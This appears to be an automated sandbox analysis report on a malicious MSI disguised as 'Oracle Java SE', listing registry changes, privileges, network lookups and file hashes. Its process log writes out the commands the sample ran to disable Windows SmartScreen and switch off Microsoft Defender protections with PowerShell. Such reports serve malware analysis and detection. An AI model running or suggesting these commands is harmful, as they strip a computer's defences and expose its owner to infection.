| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\ProductIcon = "C:\\Windows\\Installer\\{B787FD59-D138-4CB1-8AF7-72A4E4815245}\\Logo.ico" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\95DF787B831D1BC4A87F274A4E182554\ProductFeature | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\4283AD5241F3747428B68F1D87E32188 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\95DF787B831D1BC4A87F274A4E182554 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\Language = "1033" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\Version = "134217999" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\InstanceType = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\AuthorizedLUAApp = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\4283AD5241F3747428B68F1D87E32188\95DF787B831D1BC4A87F274A4E182554 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\Media\1 = ";" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\PackageCode = "0EBA20D468628E64F92B33D46217DF75" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\AdvertiseFlags = "388" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\DeploymentFlags = "3" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\PackageName = "1d2fdd9c09c8452e9c88222f2c16806a_JaffaCakes118.msi" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\Clients = 3a0000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\ProductName = "Oracle Java SE" | C:\Windows\system32\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\1d2fdd9c09c8452e9c88222f2c16806a_JaffaCakes118.msi
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 707185549E31D1DBD77E92FD1C1AA14B
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 69E98055858974A0BC153E97A3A971BB E Global\MSI0000
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe
"C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe"
C:\Windows\syswow64\cmd.exe
"cmd.exe" /C "C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\setup.bat"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\smartscreen.exe" /a
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\smartscreen.exe" /reset
C:\Windows\SysWOW64\taskkill.exe
taskkill /im smartscreen.exe /f
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\smartscreen.exe" /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionExtension ".dll""
C:\Windows\SysWOW64\cmd.exe
cmd /c powershell.exe -command "Set-MpPreference -MAPSReporting 0"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -MAPSReporting 0"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -PUAProtection disable"
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe
Register.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | repository.certum.pl | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| GB | 2.22.249.67:80 | repository.certum.pl | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.249.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.63.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.249.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | vivacemusic.site | udp |
| US | 8.8.8.8:53 | vivacemusic.site | udp |
| US | 8.8.8.8:53 | vivacemusic.site | udp |
| US | 8.8.8.8:53 | vivacemusic.site | udp |
| US | 8.8.8.8:53 | vivacemusic.site | udp |
| N/A | 127.0.0.1:60817 | | tcp |
| N/A | 127.0.0.1:60820 | | tcp |
| N/A | 127.0.0.1:60823 | | tcp |
| N/A | 127.0.0.1:60826 | | tcp |
| N/A | 127.0.0.1:60830 | | tcp |
| US | 8.8.8.8:53 | 67.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.71.105.51.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6C27B6DA8C60D333DD161137481B772E_8D2705640D941B859369EC71AB80665B
| MD5 | d594524b9c081a8c600afd725d9ab3ad |
| SHA1 | 9fa3cb863fdf41273b02c381a01565a764fbd0de |
| SHA256 | a84c97e884df6d40003e5256e40118e5e5f5575ad5039e614dd997a92a9a5230 |
| SHA512 | 5a43d5a2a91394538cdc3d771ca035e6b353a0f3da9dc078d9a2eea047c7fb7399755155b1ef763be351d2cb8e3fe8dfcaf72c42ae87c7a6b0ccaf40a3a3b5cb |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6C27B6DA8C60D333DD161137481B772E_8D2705640D941B859369EC71AB80665B
| MD5 | 6dc6905a6d95ce365a671ab8dc82fa6b |
| SHA1 | f21a03a87c7349422a276a53c00c88f010d7b184 |
| SHA256 | 12208ef455e048f59ce2738b65c46fea4841db302408285b0bbd7fb15f6afc2b |
| SHA512 | a0386ce09ef882362f5f829a9bc297fd151dc3e742747739cee2ff4ac737301e354ad464af7cfd6c81cb5fc84ce7764a7e21af0e50b66d0b5344b158470fa43c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\68FAF71AF355126BCA00CE2E73CC7374_2FC60472190717C9030A3B22E7C17DF4
| MD5 | b04dfc64dabfe7710377ebccff748e25 |
| SHA1 | f91cfb0d95fc3bc789e15bfa05b826bb01a0ec16 |
| SHA256 | 2218a64866292c09559ddabb7a1cceae04acb60091f73bcfb780d20e53cee959 |
| SHA512 | 6f147634ae21ea44fa897aad299773a8d158fbf690cc3b04ef0b75d3892984bf1213e5691f5a7da6e9d056384cac51b7e21970f6db5b5d24e7fdbe5d3c261254 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\68FAF71AF355126BCA00CE2E73CC7374_2FC60472190717C9030A3B22E7C17DF4
| MD5 | 3a40f48b697892e246893282bb93ac49 |
| SHA1 | 708c905147a4813f7e8849a424dfa18c2b8ac4cf |
| SHA256 | ee517a912087ea204e9e20c036b55e8739806052b210b644d74ed4997bff13b7 |
| SHA512 | b09803e1fa3e611e0135f2fdd51331131509f48843a74e12caa579199fac655064dc38c4db278488c0023d23dd6a27233a6bbdd1ce8778779df6e6a339b00e83 |
C:\Windows\Installer\MSIA46F.tmp
| MD5 | a3ae5d86ecf38db9427359ea37a5f646 |
| SHA1 | eb4cb5ff520717038adadcc5e1ef8f7c24b27a90 |
| SHA256 | c8d190d5be1efd2d52f72a72ae9dfa3940ab3faceb626405959349654fe18b74 |
| SHA512 | 96ecb3bc00848eeb2836e289ef7b7b2607d30790ffd1ae0e0acfc2e14f26a991c6e728b8dc67280426e478c70231f9e13f514e52c8ce7d956c1fad0e322d98e0 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe
| MD5 | 36b24a4deb93b2af6da9dba72eefaa5f |
| SHA1 | 8c55de3fa1269f4fdba9a5c701c5daad84d59f38 |
| SHA256 | d3370bb63c1908550c49601fcc664313809fcb68fdfdb81ef8129fe465a254d2 |
| SHA512 | 572355b5ab4fd349c71aaf66d5a1232e48ee697bb96b84b6656dc6b6c64f7c8098e00772e1b519805bb441159281ec5f90ff91a20ed17597704bf2492f8fff9d |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\VCRUNTIME140_1.dll
| MD5 | 1e109b1d40efcfec81a5d43d318cbb26 |
| SHA1 | 03aae193dc36d70fb34257d1276666e988b4a222 |
| SHA256 | 0f04b4cb12543687d8416dfc307593a1dbc450939fd7980d124fed4144732d69 |
| SHA512 | 762bb0fa8528936c8cfbd05e8beb557b9d751f3850124b3dcec102e3cd55550408666ffb27fea5472420ea40d95453279769765eee8f94ed2afa3d721018e1c4 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\VCRUNTIME140.dll
| MD5 | e008fbfdea1bf873f3d94d74c1cf7935 |
| SHA1 | 2a2af5e9084e7b55cdd5d01df342b02c1917573c |
| SHA256 | 678f9d715220512a823ca45d7e8545a1288728d8d47243e072e17049441cdd2b |
| SHA512 | 145acb67ab06dc90e5c7ed89623a339f595998af683bf47d665ffa23b05f9b87016b3ae5777c2c45f53b91a757e510b0f5aa5a9b908d79df3d566b2307d9d3d0 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\MSVCP140.dll
| MD5 | 9dda681b0406c3575e666f52cbde4f80 |
| SHA1 | 1951c5b2c689534cdc2fbfbc14abbf9600a66086 |
| SHA256 | 1ecd899f18b58a7915069e17582b8bf9f491a907c3fdf22b1ba1cbb2727b69b3 |
| SHA512 | 753d0af201d5c91b50e7d1ed54f44ee3c336f8124ba7a5e86b53836df520eb2733b725b877f83fda6a9a7768379b5f6fafa0bd3890766b4188ebd337272e9512 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libssl-1_1.dll
| MD5 | b3c188281aa3998f49391da0c3b52b8e |
| SHA1 | 67e6f1eb07861dddde3df9d266f683cb0331d433 |
| SHA256 | 59481427f4dad6460ac60c7619f628d6b7fad33562bbd8dc9145715ebb300e46 |
